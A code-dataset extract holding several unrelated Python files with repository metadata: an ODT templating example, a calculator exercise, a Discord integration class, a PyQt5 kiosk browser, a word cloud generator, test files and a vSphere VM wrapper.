"py3o_example_output_single_cell.odt"
)
t.set_image_path('staticimage.logo', 'images/new_logo.png')
items = list()
item1 = Item()
item1.val1 = 'Item1 Value1'
item1.val2 = 'Item1 Value2'
item1.val3 = 'Item1 Value3'
item1.Currency = 'EUR'
item1.Amount = '12,345.35'
item1.InvoiceRef = '#1234'
items.append(item1)
for i in xrange(1000):
item = Item()
item.val1 = 'Item%s Value1' % i
item.val2 = 'Item%s Value2' % i
item.val3 = 'Item%s Value3' % i
item.Currency = 'EUR'
item.Amount = '6,666.77'
item.InvoiceRef = 'Reference #%04d' % i
items.append(item)
document = Item()
document.total = '9,999,999,999,999.999'
data = dict(items=items, document=document)
t.render(data)
| 21.875
| 60
| 0.645714
|
from py3o.template import Template
t = Template(
"py3o_example_template_single_cell.odt",
"py3o_example_output_single_cell.odt"
)
t.set_image_path('staticimage.logo', 'images/new_logo.png')
class Item(object):
pass
items = list()
item1 = Item()
item1.val1 = 'Item1 Value1'
item1.val2 = 'Item1 Value2'
item1.val3 = 'Item1 Value3'
item1.Currency = 'EUR'
item1.Amount = '12,345.35'
item1.InvoiceRef = '#1234'
items.append(item1)
for i in xrange(1000):
item = Item()
item.val1 = 'Item%s Value1' % i
item.val2 = 'Item%s Value2' % i
item.val3 = 'Item%s Value3' % i
item.Currency = 'EUR'
item.Amount = '6,666.77'
item.InvoiceRef = 'Reference #%04d' % i
items.append(item)
document = Item()
document.total = '9,999,999,999,999.999'
data = dict(items=items, document=document)
t.render(data)
| 0
| 8
| 25
|
5e529e7707da7ca177bde6d4d7eadd1ee8b03b6b
| 468
|
py
|
Python
|
lesson 6/question 7.py
|
Kev-in123/ICS2O7
|
425c59975d4ce6aa0937fd8715b51d04487e4fa9
|
[
"MIT"
] | 2
|
2021-08-10T18:16:08.000Z
|
2021-09-26T19:49:26.000Z
|
lesson 6/question 7.py
|
Kev-in123/ICS2O7
|
425c59975d4ce6aa0937fd8715b51d04487e4fa9
|
[
"MIT"
] | null | null | null |
lesson 6/question 7.py
|
Kev-in123/ICS2O7
|
425c59975d4ce6aa0937fd8715b51d04487e4fa9
|
[
"MIT"
] | null | null | null |
num1 = float(input("Number 1: "))
num2 = float(input("Wumber 2: "))
operation = input("Which operation (+,-,/,*): ")
if operation == "+":
print(f"The sum is {num1 + num2}")
if operation == "-":
print(f"The difference is {num1 - num2}")
if operation == "/":
if num2 != 0:
print(f"The quotient is {num1 / num2}")
else:
print("Cannot divide any number by zero!")
if operation == "*":
print(f"The product is {num1 * num2}")
| 24.631579
| 49
| 0.557692
|
num1 = float(input("Number 1: "))
num2 = float(input("Wumber 2: "))
operation = input("Which operation (+,-,/,*): ")
if operation == "+":
print(f"The sum is {num1 + num2}")
if operation == "-":
print(f"The difference is {num1 - num2}")
if operation == "/":
if num2 != 0:
print(f"The quotient is {num1 / num2}")
else:
print("Cannot divide any number by zero!")
if operation == "*":
print(f"The product is {num1 * num2}")
| 0
| 0
| 0
|
5e3b4e520e44677ef5084651d4a02fae10e6565f
| 3,574
|
py
|
Python
|
hata/discord/integration/integration_detail.py
|
Multiface24111/hata
|
cd28f9ef158e347363669cc8d1d49db0ff41aba0
|
[
"0BSD"
] | 173
|
2019-06-14T20:25:00.000Z
|
2022-03-21T19:36:10.000Z
|
hata/discord/integration/integration_detail.py
|
Multiface24111/hata
|
cd28f9ef158e347363669cc8d1d49db0ff41aba0
|
[
"0BSD"
] | 52
|
2020-01-03T17:05:14.000Z
|
2022-03-31T11:39:50.000Z
|
hata/discord/integration/integration_detail.py
|
Multiface24111/hata
|
cd28f9ef158e347363669cc8d1d49db0ff41aba0
|
[
"0BSD"
] | 47
|
2019-11-09T08:46:45.000Z
|
2022-03-31T14:33:34.000Z
|
__all__ = ('IntegrationDetail', )
from ..core import ROLES
from ..utils import timestamp_to_datetime, DISCORD_EPOCH_START
from ..role import create_partial_role_from_id
from .preinstanced import IntegrationExpireBehavior
class IntegrationDetail:
"""
Details about a non discord integration.
Attributes
----------
expire_behavior : ``IntegrationExpireBehavior``
The behavior of expiring subscription.
expire_grace_period : `int`
The grace period in days for expiring subscribers. Can be `1`, `3`, `7`, `14` or `30`. If the integration is
partial, or is not applicable for it, then is set as `-1`.
role_id : `int`
The role's identifier what the integration uses for subscribers.
subscriber_count : `int`
How many subscribers the integration has. Defaults to `0`.
synced_at : `datetime`
When the integration was last synced.
syncing : `bool`
Whether the integration syncing.
"""
__slots__ = ('expire_behavior', 'expire_grace_period', 'role_id', 'subscriber_count', 'synced_at', 'syncing', )
def __init__(self, data):
"""
Fills up the integration detail from the respective integration's data.
Parameters
----------
data : `dict` of (`str`, `Any`) items
Received integration data.
"""
self.syncing = data.get('syncing', False)
role_id = data.get('role_id', None)
if role_id is None:
role_id = 0
else:
role_id = int(role_id)
self.role_id = role_id
self.expire_behavior = IntegrationExpireBehavior.get(data.get('expire_behavior', 0))
self.expire_grace_period = data.get('expire_grace_period', -1)
try:
synced_at = data['synced_at']
except KeyError:
synced_at = DISCORD_EPOCH_START
else:
synced_at = timestamp_to_datetime(synced_at)
self.synced_at = synced_at
self.subscriber_count = data.get('subscriber_count', 0)
@property
def role(self):
"""
Returns the integration's role.
Returns
-------
role : `None` or ``Role``
"""
role_id = self.role_id
if role_id:
return create_partial_role_from_id(role_id)
@classmethod
def from_role(cls, role):
"""
Creates a partial integration detail with the given role.
Parameters
----------
role : ``Role``
The respective role.
Returns
-------
self : ``IntegrationDetail``
The created integration detail.
"""
self = object.__new__(cls)
self.syncing = False
self.role_id = role.id
self.expire_behavior = IntegrationExpireBehavior.remove_role
self.expire_grace_period = -1
self.synced_at = DISCORD_EPOCH_START
self.subscriber_count = 0
return self
def __repr__(self):
"""Returns the integration detail's representation."""
repr_parts = [
'<', self.__class__.__name__,
]
role_id = self.role_id
if role_id:
try:
role = ROLES[role_id]
except KeyError:
pass
else:
repr_parts.append(' role=')
repr_parts.append(repr(role))
repr_parts.append('>')
return ''.join(repr_parts)
| 30.033613
| 116
| 0.570229
|
__all__ = ('IntegrationDetail', )
from ..core import ROLES
from ..utils import timestamp_to_datetime, DISCORD_EPOCH_START
from ..role import create_partial_role_from_id
from .preinstanced import IntegrationExpireBehavior
class IntegrationDetail:
"""
Details about a non discord integration.
Attributes
----------
expire_behavior : ``IntegrationExpireBehavior``
The behavior of expiring subscription.
expire_grace_period : `int`
The grace period in days for expiring subscribers. Can be `1`, `3`, `7`, `14` or `30`. If the integration is
partial, or is not applicable for it, then is set as `-1`.
role_id : `int`
The role's identifier what the integration uses for subscribers.
subscriber_count : `int`
How many subscribers the integration has. Defaults to `0`.
synced_at : `datetime`
When the integration was last synced.
syncing : `bool`
Whether the integration syncing.
"""
__slots__ = ('expire_behavior', 'expire_grace_period', 'role_id', 'subscriber_count', 'synced_at', 'syncing', )
def __init__(self, data):
"""
Fills up the integration detail from the respective integration's data.
Parameters
----------
data : `dict` of (`str`, `Any`) items
Received integration data.
"""
self.syncing = data.get('syncing', False)
role_id = data.get('role_id', None)
if role_id is None:
role_id = 0
else:
role_id = int(role_id)
self.role_id = role_id
self.expire_behavior = IntegrationExpireBehavior.get(data.get('expire_behavior', 0))
self.expire_grace_period = data.get('expire_grace_period', -1)
try:
synced_at = data['synced_at']
except KeyError:
synced_at = DISCORD_EPOCH_START
else:
synced_at = timestamp_to_datetime(synced_at)
self.synced_at = synced_at
self.subscriber_count = data.get('subscriber_count', 0)
@property
def role(self):
"""
Returns the integration's role.
Returns
-------
role : `None` or ``Role``
"""
role_id = self.role_id
if role_id:
return create_partial_role_from_id(role_id)
@classmethod
def from_role(cls, role):
"""
Creates a partial integration detail with the given role.
Parameters
----------
role : ``Role``
The respective role.
Returns
-------
self : ``IntegrationDetail``
The created integration detail.
"""
self = object.__new__(cls)
self.syncing = False
self.role_id = role.id
self.expire_behavior = IntegrationExpireBehavior.remove_role
self.expire_grace_period = -1
self.synced_at = DISCORD_EPOCH_START
self.subscriber_count = 0
return self
def __repr__(self):
"""Returns the integration detail's representation."""
repr_parts = [
'<', self.__class__.__name__,
]
role_id = self.role_id
if role_id:
try:
role = ROLES[role_id]
except KeyError:
pass
else:
repr_parts.append(' role=')
repr_parts.append(repr(role))
repr_parts.append('>')
return ''.join(repr_parts)
| 0
| 0
| 0
|
6cc1141c1620e59785bdb019aca3300e2db9915b
| 553
|
py
|
Python
|
main.py
|
robingather/com-thesis
|
30a6e815c4f71edc332a4e74a25faf0dd21c1244
|
[
"MIT"
] | null | null | null |
main.py
|
robingather/com-thesis
|
30a6e815c4f71edc332a4e74a25faf0dd21c1244
|
[
"MIT"
] | null | null | null |
main.py
|
robingather/com-thesis
|
30a6e815c4f71edc332a4e74a25faf0dd21c1244
|
[
"MIT"
] | null | null | null |
from controller import Controller
import torch
import cProfile
import pstats
OPTIMIZE = False # True to generate performance reports
if OPTIMIZE:
cProfile.run('main()', "output.dat")
with open("output_time.txt","w") as f:
p = pstats.Stats("output. dat", stream=f)
p.sort_stats("time").print_stats()
with open("output_calls.txt","w") as f:
p = pstats.Stats("output.dat", stream=f)
p.sort_stats("calls").print_stats()
else:
main()
| 25.136364
| 55
| 0.636528
|
from controller import Controller
import torch
import cProfile
import pstats
OPTIMIZE = False # True to generate performance reports
def main():
with torch.no_grad():
Controller().run()
if OPTIMIZE:
cProfile.run('main()', "output.dat")
with open("output_time.txt","w") as f:
p = pstats.Stats("output. dat", stream=f)
p.sort_stats("time").print_stats()
with open("output_calls.txt","w") as f:
p = pstats.Stats("output.dat", stream=f)
p.sort_stats("calls").print_stats()
else:
main()
| 43
| 0
| 25
|
b77e52d98375ce98d4528ec49707a93bfcb316e0
| 169
|
py
|
Python
|
nodeClasses/startNode.py
|
marios-stam/PathFinding
|
b6f7d438fe8c2569db85d6c3d508846ccc3bc863
|
[
"MIT"
] | null | null | null |
nodeClasses/startNode.py
|
marios-stam/PathFinding
|
b6f7d438fe8c2569db85d6c3d508846ccc3bc863
|
[
"MIT"
] | null | null | null |
nodeClasses/startNode.py
|
marios-stam/PathFinding
|
b6f7d438fe8c2569db85d6c3d508846ccc3bc863
|
[
"MIT"
] | null | null | null |
from nodeClasses.node import node
| 18.777778
| 35
| 0.615385
|
from nodeClasses.node import node
class startNode(node):
def __init__(self,x,y):
node.__init__(self,x,y)
def getFcost(self):
return 0
| 49
| 1
| 83
|
df433c4a7339699215931d516699a115b7d6a36b
| 318
|
py
|
Python
|
app/tests/unit/test_log_use_cases.py
|
bda-19fs/bda-chatbot
|
4fcbda813ff5d3854a4c2e12413775676bcba9e2
|
[
"MIT"
] | 1
|
2019-05-25T12:12:39.000Z
|
2019-05-25T12:12:39.000Z
|
app/tests/unit/test_log_use_cases.py
|
bda-19fs/bda-chatbot
|
4fcbda813ff5d3854a4c2e12413775676bcba9e2
|
[
"MIT"
] | null | null | null |
app/tests/unit/test_log_use_cases.py
|
bda-19fs/bda-chatbot
|
4fcbda813ff5d3854a4c2e12413775676bcba9e2
|
[
"MIT"
] | null | null | null |
import logging
from bda_core.use_cases.log.log_info import log_info
| 28.909091
| 59
| 0.72956
|
import logging
from bda_core.use_cases.log.log_info import log_info
def test_log_info(capsys):
logging.getLogger().addHandler(logging.StreamHandler())
log_info(msg='I am in a unit test', log=logging)
captured = capsys.readouterr()
log_msg = 'I am in a unit test\n'
assert captured.err == log_msg
| 226
| 0
| 23
|
5f4be6e4666e04d53f03216c425c40dad46daa50
| 2,980
|
py
|
Python
|
kiosk/kiosk_browser/browser_widget.py
|
dividat/playos
|
fae198150789696b2c2d51cf099cb9f6c9563022
|
[
"MIT"
] | 1
|
2021-06-10T11:05:05.000Z
|
2021-06-10T11:05:05.000Z
|
kiosk/kiosk_browser/browser_widget.py
|
dividat/playos
|
fae198150789696b2c2d51cf099cb9f6c9563022
|
[
"MIT"
] | 45
|
2019-01-23T15:36:43.000Z
|
2022-03-29T08:23:30.000Z
|
kiosk/kiosk_browser/browser_widget.py
|
dividat/playos
|
fae198150789696b2c2d51cf099cb9f6c9563022
|
[
"MIT"
] | 7
|
2019-01-18T13:53:14.000Z
|
2021-02-03T10:17:51.000Z
|
import re
import urllib
import logging
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import QShortcut
from PyQt5.QtWebEngineWidgets import QWebEngineView, QWebEngineSettings
from PyQt5.QtWidgets import QSizePolicy
from kiosk_browser import system
def user_agent_with_system(user_agent, system_name, system_version):
"""Inject a specific system into a user agent string"""
pattern = re.compile('(Mozilla/5.0) \(([^\)]*)\)(.*)')
m = pattern.match(user_agent)
if m == None:
return f"{system_name}/{system_version} {user_agent}"
else:
if not m.group(2):
system_detail = f"{system_name} {system_version}"
else:
system_detail = f"{m.group(2)}; {system_name} {system_version}"
return f"{m.group(1)} ({system_detail}){m.group(3)}"
| 35.903614
| 102
| 0.668792
|
import re
import urllib
import logging
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import QShortcut
from PyQt5.QtWebEngineWidgets import QWebEngineView, QWebEngineSettings
from PyQt5.QtWidgets import QSizePolicy
from kiosk_browser import system
class BrowserWidget(QWebEngineView):
def __init__(self, url, get_current_proxy, *args, **kwargs):
QWebEngineView.__init__(self, *args, **kwargs)
# Register proxy authentication handler
self.page().proxyAuthenticationRequired.connect(
lambda url, auth, proxyHost: self._proxy_auth(
get_current_proxy, url, auth, proxyHost))
# Override user agent
self.page().profile().setHttpUserAgent(user_agent_with_system(
user_agent = self.page().profile().httpUserAgent(),
system_name = system.NAME,
system_version = system.VERSION
))
# Allow sound playback without user gesture
self.page().settings().setAttribute(QWebEngineSettings.PlaybackRequiresUserGesture, False)
# Load url
self.page().setUrl(url)
# Shortcut to manually reload
self.reload_shortcut = QShortcut('CTRL+R', self)
self.reload_shortcut.activated.connect(self.reload)
# Check if pages is correctly loaded
self.loadFinished.connect(self._load_finished)
# Shortcut to close
self.quit_shortcut = QShortcut('CTRL+ALT+DELETE', self)
self.quit_shortcut.activated.connect(lambda: self.close())
# Stretch the browser
policy = QSizePolicy()
policy.setVerticalStretch(1)
policy.setHorizontalStretch(1)
policy.setVerticalPolicy(QSizePolicy.Preferred)
policy.setHorizontalPolicy(QSizePolicy.Preferred)
self.setSizePolicy(policy)
def load(self, url):
self.page().setUrl(url)
def _load_finished(self, success):
if not success:
QTimer.singleShot(5000, self.reload)
def _proxy_auth(self, get_current_proxy, url, auth, proxyHost):
proxy = get_current_proxy()
if proxy is not None and proxy.username is not None and proxy.password is not None:
logging.info("Authenticating proxy")
auth.setUser(proxy.username)
auth.setPassword(proxy.password)
else:
logging.info("Proxy authentication request ignored because credentials are not provided.")
def user_agent_with_system(user_agent, system_name, system_version):
"""Inject a specific system into a user agent string"""
pattern = re.compile('(Mozilla/5.0) \(([^\)]*)\)(.*)')
m = pattern.match(user_agent)
if m == None:
return f"{system_name}/{system_version} {user_agent}"
else:
if not m.group(2):
system_detail = f"{system_name} {system_version}"
else:
system_detail = f"{m.group(2)}; {system_name} {system_version}"
return f"{m.group(1)} ({system_detail}){m.group(3)}"
| 2,024
| 15
| 131
|
c9f09c526c716364169dbbaeba34b703a91c1d8a
| 2,625
|
py
|
Python
|
wordCloudGenerator.py
|
cwen96/Word-Cloud-Generator
|
0dcc23ad37f231230f80849b49de6448c84e3a7b
|
[
"MIT"
] | null | null | null |
wordCloudGenerator.py
|
cwen96/Word-Cloud-Generator
|
0dcc23ad37f231230f80849b49de6448c84e3a7b
|
[
"MIT"
] | null | null | null |
wordCloudGenerator.py
|
cwen96/Word-Cloud-Generator
|
0dcc23ad37f231230f80849b49de6448c84e3a7b
|
[
"MIT"
] | null | null | null |
#wordCloudGenerator.py
import wordcloud
from matplotlib import pyplot as plot
import tkinter
from tkinter.filedialog import askopenfile
#Reads the selected file and then draws the wordcloud
#Removes punctuation from words
#Calculates how many times each word appears in the text file
if __name__ == "__main__":
main()
| 37.5
| 117
| 0.610286
|
#wordCloudGenerator.py
import wordcloud
from matplotlib import pyplot as plot
import tkinter
from tkinter.filedialog import askopenfile
#Reads the selected file and then draws the wordcloud
def readFileAndDrawPlot():
file = askopenfile(mode = 'rb', filetypes = [("Text Files", "*.txt")])
fileContents = ""
for i in file:
fileContents += str(i, 'utf-8')
drawPlot(fileContents)
def drawPlot(fileContents):
myimage = calculate_frequencies(fileContents)
plot.imshow(myimage, interpolation = 'nearest')
plot.axis('off')
plot.show()
#Removes punctuation from words
def omit_punctuation(word, punctuation):
newWord = ""
for c in word:
if c not in punctuation:
newWord += c
return newWord
#Calculates how many times each word appears in the text file
def calculate_frequencies(fileContents):
#List of punctuations and uninteresting words to be excluded from the wordcloud
punctuations = '''!()-[]{};:'"\,<>./?@#$%^&*_~'''
uninteresting_words = ["the", "a", "to", "if", "is", "it", "of", "and", "or", "an", "as", "i", "me", "my", \
"we", "our", "ours", "you", "your", "yours", "he", "she", "him", "his", "her", "hers", "its", "they", "them", \
"their", "what", "which", "who", "whom", "this", "that", "am", "are", "was", "were", "be", "been", "being", \
"have", "has", "had", "do", "does", "did", "but", "at", "by", "with", "from", "here", "when", "where", "how", \
"all", "any", "both", "each", "few", "more", "some", "such", "no", "nor", "too", "very", "can", "will", "just", \
"for", "in", "not", "into", "so"]
wordCount = {}
for word in fileContents.split():
lowercase = word.lower()
lowercase = omit_punctuation(lowercase, punctuations)
if not lowercase.isalpha() or lowercase in uninteresting_words:
continue
if lowercase in wordCount:
wordCount[lowercase] += 1
else:
wordCount[lowercase] = 1
#wordcloud
cloud = wordcloud.WordCloud()
cloud.generate_from_frequencies(wordCount)
return cloud.to_array()
def main():
#GUI
root = tkinter.Tk()
root.title("Word Cloud Generator")
root.geometry("300x100")
textFrame = tkinter.Frame(root)
textFrame.pack()
label = tkinter.Label(textFrame, text = "Please open a text file", foreground="black",font=("Calibri", 20))
label.pack(side = tkinter.TOP)
button = tkinter.Button(textFrame, text = "Browse...", command = readFileAndDrawPlot)
button.pack(side = tkinter.BOTTOM)
root.mainloop()
if __name__ == "__main__":
main()
| 2,179
| 0
| 112
|
8278d8338dc03e1303d76a76e15b4eab9b77b17e
| 400
|
py
|
Python
|
examples/apps/GetImage/GetImage.py
|
HornedSungem/SungemSDK-Python
|
5ce5eb7f84654aecf6840de773188f436219559d
|
[
"Apache-2.0"
] | 14
|
2018-08-16T09:11:39.000Z
|
2019-12-07T12:54:32.000Z
|
examples/apps/GetImage/GetImage.py
|
HornedSungem/SungemSDK-Python
|
5ce5eb7f84654aecf6840de773188f436219559d
|
[
"Apache-2.0"
] | 2
|
2019-08-23T23:31:10.000Z
|
2020-06-17T09:21:57.000Z
|
examples/apps/GetImage/GetImage.py
|
HornedSungem/SungemSDK-Python
|
5ce5eb7f84654aecf6840de773188f436219559d
|
[
"Apache-2.0"
] | 7
|
2018-10-02T01:46:43.000Z
|
2021-06-04T19:10:47.000Z
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright(c) 2018 Senscape Corporation.
# License: Apache 2.0
# Import libs
import cv2, sys, numpy as np
sys.path.append('../../../')
import hsapi as hs
device = hs.GetDevice()
device.OpenDevice()
try:
while(1):
image = device.GetImage(False)
cv2.imshow('image',image)
cv2.waitKey(1)
finally:
device.CloseDevice()
| 18.181818
| 41
| 0.6325
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright(c) 2018 Senscape Corporation.
# License: Apache 2.0
# Import libs
import cv2, sys, numpy as np
sys.path.append('../../../')
import hsapi as hs
device = hs.GetDevice()
device.OpenDevice()
try:
while(1):
image = device.GetImage(False)
cv2.imshow('image',image)
cv2.waitKey(1)
finally:
device.CloseDevice()
| 0
| 0
| 0
|
7ce2de320184ff667c45ca79b9e4aac27a385587
| 1,062
|
py
|
Python
|
src/cactus/faces/cactus_fillAdjacenciesTest.py
|
Robin-Rounthwaite/cactus
|
3c612779b83b75cb42e08dc143b9cb81c257cf80
|
[
"MIT-0"
] | 1
|
2020-12-16T07:08:29.000Z
|
2020-12-16T07:08:29.000Z
|
src/cactus/faces/cactus_fillAdjacenciesTest.py
|
Robin-Rounthwaite/cactus
|
3c612779b83b75cb42e08dc143b9cb81c257cf80
|
[
"MIT-0"
] | null | null | null |
src/cactus/faces/cactus_fillAdjacenciesTest.py
|
Robin-Rounthwaite/cactus
|
3c612779b83b75cb42e08dc143b9cb81c257cf80
|
[
"MIT-0"
] | null | null | null |
#!/usr/bin/env python3
#Copyright (C) 2009-2011 by Benedict Paten (benedictpaten@gmail.com)
#
#Released under the MIT license, see LICENSE.txt
import unittest
import sys
from sonLib.bioio import TestStatus
from cactus.shared.test import getCactusInputs_random
from cactus.shared.test import getCactusInputs_blanchette
from cactus.shared.test import runWorkflow_multipleExamples
if __name__ == '__main__':
unittest.main()
| 35.4
| 142
| 0.708098
|
#!/usr/bin/env python3
#Copyright (C) 2009-2011 by Benedict Paten (benedictpaten@gmail.com)
#
#Released under the MIT license, see LICENSE.txt
import unittest
import sys
from sonLib.bioio import TestStatus
from cactus.shared.test import getCactusInputs_random
from cactus.shared.test import getCactusInputs_blanchette
from cactus.shared.test import runWorkflow_multipleExamples
class TestCase(unittest.TestCase):
@TestStatus.longLength
def testCactus_Random(self):
runWorkflow_multipleExamples(self.id(), getCactusInputs_random,
testNumber=TestStatus.getTestSetup(),
buildAvgs=True)
@unittest.skip("test was never updated when changes were made to the way ancestors work (ERROR: Couldn't find reference event reference)")
@TestStatus.longLength
def testCactus_Blanchette(self):
runWorkflow_multipleExamples(self.id(), getCactusInputs_blanchette,
buildAvgs=True)
if __name__ == '__main__':
unittest.main()
| 347
| 263
| 23
|
829a2dee42cf284eaec4c66674bea0c8190e627a
| 6,680
|
py
|
Python
|
k8_vmware/vsphere/VM.py
|
aduvukace/k8-vmware
|
128a87731e342208c683e26ba79993a365d63f4b
|
[
"Apache-2.0"
] | null | null | null |
k8_vmware/vsphere/VM.py
|
aduvukace/k8-vmware
|
128a87731e342208c683e26ba79993a365d63f4b
|
[
"Apache-2.0"
] | null | null | null |
k8_vmware/vsphere/VM.py
|
aduvukace/k8-vmware
|
128a87731e342208c683e26ba79993a365d63f4b
|
[
"Apache-2.0"
] | null | null | null |
import pyVmomi
from osbot_utils.utils.Misc import wait
from k8_vmware.vsphere.VM_Keystroke import VM_Keystroke
| 39.526627
| 144
| 0.580689
|
import pyVmomi
from osbot_utils.utils.Misc import wait
from k8_vmware.vsphere.VM_Keystroke import VM_Keystroke
class VM:
def __init__(self, vm):
self.vm = vm
def config(self):
return self.summary().config
def controller_scsi(self):
controllers = self.devices_SCSI_Controllers()
if len(controllers) > 0:
return controllers[0] # default to returning the first one
def controller_ide(self):
controllers = self.devices_IDE_Controllers()
if len(controllers) > 0:
return controllers[0] # default to returning the first one
def controller_ide_free_slot(self):
controllers = self.devices_IDE_Controllers()
for controller in controllers:
if len(controller.device) < 2:
return controller
def devices(self):
return self.vm.config.hardware.device
def devices_IDE_Controllers (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualIDEController )
def devices_Cdroms (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualCdrom )
def devices_Disks (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualDisk )
def devices_AHCI_Controllers (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualAHCIController )
def devices_PCNet_32s (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualPCNet32 )
def devices_Vmxnet_2s (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualVmxnet2 )
def devices_Vmxnet_3s (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualVmxnet3 )
def devices_E1000s (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualE1000 )
def devices_E1000es (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualE1000e )
def devices_SCSI_Controllers (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualSCSIController )
def devices_Sriov_EthernetCards (self): return self.devices_of_type(pyVmomi.vim.vm.device.VirtualSriovEthernetCard )
def devices_of_type(self, type):
devices = []
for device in self.devices():
if isinstance(device, type):
devices.append(device)
return devices
def devices_indexed_by_label(self):
devices = {}
for device in self.devices():
key = device.deviceInfo.label
value = device
devices[key] = value
return devices
def guest(self):
return self.summary().guest
def id(self):
return f"vim.{self.vm._wsdlName}:{self.vm._moId}"
#note: we can also get this value from these methods (but they will do an extra request to the server)
# str(self.resource_config().entity)
# self.summary().vm
def info(self):
summary = self.summary() # need to do this since each reference to self.vm.summary.config is call REST call to the server
#print(summary)
config = summary.config # these values are retrieved on the initial call to self.vm.summary
guest = summary.guest # using self.vm.summary.guest here would had resulted in two more REST calls
runtime = summary.runtime
info = {
"Boot_Time" : str(runtime.bootTime) ,
"Connection_State" : runtime.connectionState,
"Guest_Id" : config.guestId ,
"Guest_Full_Name" : config.guestFullName ,
"Host" : runtime.host ,
"Host_Name" : guest.hostName ,
"IP" : guest.ipAddress ,
"Memory_Size_MB" : config.memorySizeMB ,
"MOID" : self.vm._moId ,
"Name" : config.name ,
"Max_Cpu_Usage" : runtime.maxCpuUsage ,
"Max_Memory_Usage" : runtime.maxMemoryUsage ,
"Notes" : config.annotation ,
"Num_Cpu" : config.numCpu ,
"Path_Name" : config.vmPathName ,
"State_State" : runtime.powerState ,
"Question" : None ,
"UUID" : config.uuid
}
# if guest != None: info['IP'] = guest.ipAddress
if runtime.question != None: info['Question'] = runtime.question.text,
return info
def hardware(self):
return self.vm.config.hardware
def host_name(self):
return self.guest().hostName
def ip(self):
return self.guest().ipAddress
def name(self):
return self.config().name
def moid(self):
return str(self.vm._moId)
def powered_state(self):
return self.runtime().powerState
def power_on(self):
return self.task().power_on()
def power_off(self):
return self.task().power_off()
def powered_on(self):
return self.powered_state() == 'poweredOn'
def powered_off(self):
return self.powered_state() == 'poweredOff'
def resource_config(self):
return self.vm.resourceConfig
def screenshot(self, target_file=None):
from k8_vmware.vsphere.VM_Screenshot import VM_Screenshot
return VM_Screenshot(self, target_file=target_file).download()
def send_text(self, text):
VM_Keystroke(self).send_text(text)
return self
def send_key(self, text):
result = VM_Keystroke(self).send_key(text)
return self
def send_enter(self):
VM_Keystroke(self).enter()
return self
def summary(self):
return self.vm.summary # will make REST call to RetrievePropertiesEx
def task(self):
from k8_vmware.vsphere.VM_Task import VM_Task # have to do this import here due to circular dependencies (i.e. VM_Task imports VM)
return VM_Task(self)
def runtime(self):
return self.vm.summary.runtime
def uuid(self):
return self.config().uuid
def wait(self, seconds): # to help with fluent code
wait(seconds)
return self
def __str__(self):
return f'[VM] {self.name()}'
| 5,405
| -12
| 1,172
|
8aa1d75f638cfc7d435e032ffae08cc74818678a
| 127
|
py
|
Python
|
genetic-algorithm-flyfood/testes/teste/change.py
|
JessyLeal/flyfood
|
5b0ec6b1b86078208202019a8096df0fdbe6c3b3
|
[
"MIT"
] | 1
|
2022-03-13T20:22:50.000Z
|
2022-03-13T20:22:50.000Z
|
genetic-algorithm-flyfood/testes/teste/change.py
|
JessyLeal/flyfood
|
5b0ec6b1b86078208202019a8096df0fdbe6c3b3
|
[
"MIT"
] | null | null | null |
genetic-algorithm-flyfood/testes/teste/change.py
|
JessyLeal/flyfood
|
5b0ec6b1b86078208202019a8096df0fdbe6c3b3
|
[
"MIT"
] | null | null | null |
lista = ['oi', 'bem', 'meu']
a, b = lista.index('bem'), lista.index('meu')
lista[b], lista[a] = lista[a], lista[b]
print(lista)
| 31.75
| 45
| 0.590551
|
lista = ['oi', 'bem', 'meu']
a, b = lista.index('bem'), lista.index('meu')
lista[b], lista[a] = lista[a], lista[b]
print(lista)
| 0
| 0
| 0
|